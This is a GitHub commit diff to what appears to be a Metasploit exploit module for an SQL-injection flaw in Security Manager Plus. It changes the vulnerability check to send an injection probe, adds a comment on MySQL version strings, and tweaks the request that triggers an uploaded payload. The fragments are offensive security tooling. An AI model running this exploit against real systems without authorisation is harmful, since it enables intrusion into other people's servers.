File tree Expand file tree Collapse file tree 1 file changed +5
-7
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +5
-7
lines changed Original file line number Diff line number Diff line change @@ -52,14 +52,11 @@ def initialize(info={})
5252 end
5353
5454
55- #
56- # A very gentle check to see if Security Manager Plus exists or not
57- #
5855 def check
59- res = send_request_raw ( { 'uri' => '/SecurityManager.cc' } )
56+ res = sqli_exec ( Rex :: Text . rand_text_alpha ( 1 ) )
6057
61- if res and res . body =~ /\< title \> SecurityManager Plus \< \/ title \> /
62- return Exploit ::CheckCode ::Detected
58+ if res and res . body =~ /Error during search /
59+ return Exploit ::CheckCode ::Appears
6360 else
6461 return Exploit ::CheckCode ::Safe
6562 end
@@ -82,6 +79,7 @@ def pick_target
8279
8380 res = send_request_raw ( { 'uri' => "/#{ rnd_fname } } )
8481
82+ # What @@version returns:
8583 # Linux = 5.0.36-enterprise
8684 # Windows = 5.0.36-enterprise-nt
8785
@@ -248,7 +246,7 @@ def inject_exec(out)
248246
249247 fname = "/#{ File . basename ( out ) }
250248 print_status ( "#{ rhost } #{ rport } #{ fname } )
251- res = send_request_raw ( { 'uri' => fname } )
249+ send_request_raw ( { 'uri' => fname } )
252250
253251 handler
254252 end
You can’t perform that action at this time.
0 commit comments